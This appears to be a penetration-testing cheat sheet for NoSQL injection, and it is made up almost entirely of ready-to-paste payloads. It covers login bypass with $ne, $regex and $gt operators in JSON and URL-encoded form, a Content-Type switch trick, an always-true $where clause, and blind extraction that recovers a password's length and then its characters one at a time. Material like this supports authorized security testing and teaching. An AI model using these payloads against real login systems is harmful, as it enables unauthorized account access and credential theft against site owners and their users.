NoSQLi

Authentication Bypass

Bypass by checking both fields exist

{"username": {"$ne": null}, "password": {"$ne": null}}

Bypass using regex wildcard to match any value

{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}

Bypass for known username, password greater than empty string

{"username": "admin", "password": {"$gt": ""}}

URL-encoded bypasses

URL-encoded version of null check bypass

username[$ne]=null&password[$ne]=null

URL-encoded regex wildcard bypass

username[$regex]=.*&password[$regex]=.*

NoSQL Login Bypass by Content-Type Switch

With Content-Type: application/x-www-form-urlencoded try:

URL-Encoded

user=admin&password[$ne]=wrongpassword

Otherwise, set the Content-Type to application/json on the POST request:B

JSON

{"user": "admin", "password": {"$ne": "wrongpassword"}}

JSON injection in web forms

Both fields not equal to empty string

{"username": {"$ne": ""}, "password": {"$ne": ""}}

$where clause always evaluates to true

{"$where": "this.username == this.username"}

Blind NoSQL injection

Length enumeration

{"username": "admin", "password": {"$regex": ".{1}"}}

{"username": "admin", "password": {"$regex": ".{2}"}}

Character-by-character extraction

{"username": "admin", "password": {"$regex": "^a.*"}}

{"username": "admin", "password": {"$regex": "^ad.*"}}

Last updated 3 months ago